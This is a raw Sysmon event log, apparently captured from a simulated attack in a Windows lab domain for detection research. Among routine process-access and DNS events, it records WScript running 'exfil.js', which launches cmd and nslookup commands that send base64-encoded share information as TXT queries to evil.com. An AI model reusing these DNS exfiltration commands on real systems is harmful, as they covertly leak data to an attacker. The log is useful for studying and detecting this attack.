14:21:29.480{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208197Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.480{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208196Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.480{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-5343-000000005F02}7792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208195Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.480{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208194Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.480{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208193Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.480{2E1864BB-18E9-629A-5143-000000005F02}28207380C:\Windows\system32\cmd.exe{2E1864BB-18E9-629A-5343-000000005F02}7792C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.489{2E1864BB-18E9-629A-5343-000000005F02}7792C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E9-629A-5143-000000005F02}2820C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlemzzw.tmp 2>&1 10341000x8000000000000000208191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.459{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-5243-000000005F02}5604C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.459{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-5243-000000005F02}5604C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.459{2E1864BB-18E9-629A-5243-000000005F02}56042608C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-5143-000000005F02}2820C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.459{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-5243-000000005F02}5604C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.443{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.443{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.443{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.443{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.443{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-5143-000000005F02}2820C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.443{2E1864BB-18E0-629A-6742-000000005F02}39763460C:\Windows\System32\WScript.exe{2E1864BB-18E9-629A-5143-000000005F02}2820C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.455{2E1864BB-18E9-629A-5143-000000005F02}2820C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlw= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlemzzw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000208180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.443{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlajidam.tmpMD5=F6538327F98D74144BA52EAB59FD8171,SHA256=A568CE5C7493269BCFA80FC109B1A109EB505115BC218515B0E503F4B1DBE007,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000208179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.427{2E1864BB-18E9-629A-4F43-000000005F02}35882520C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-5043-000000005F02}5404C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.412{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.412{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.412{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.412{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E9-629A-5043-000000005F02}5404C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000208174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.412{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.412{2E1864BB-18E9-629A-4E43-000000005F02}62004776C:\Windows\system32\cmd.exe{2E1864BB-18E9-629A-5043-000000005F02}5404C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000208172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.423{2E1864BB-18E9-629A-5043-000000005F02}5404C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E9-629A-4E43-000000005F02}6200C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBDJA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlajidam.tmp 2>&1 10341000x8000000000000000208171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.396{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-4F43-000000005F02}3588C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.396{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E9-629A-4F43-000000005F02}3588C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000208169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:29.396{2E1864BB-18E9-629A-4F43-000000005F02}35882520C:\Windows\system32\conhost.exe{2E1864BB-18E9-629A-4E43-000000005F02}6200C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000208168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.889{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50596- 354300x8000000000000000208167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.889{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50595- 354300x8000000000000000208166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.888{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-50594- 354300x8000000000000000208165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.786{00000000-0000-0000-0000-000000000000}6512<unknown process>-udpfalsefalse127.0.0.1-50593-false127.0.0.1-53domain 354300x8000000000000000208164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.786{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local60785-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000208163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:27.785{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT 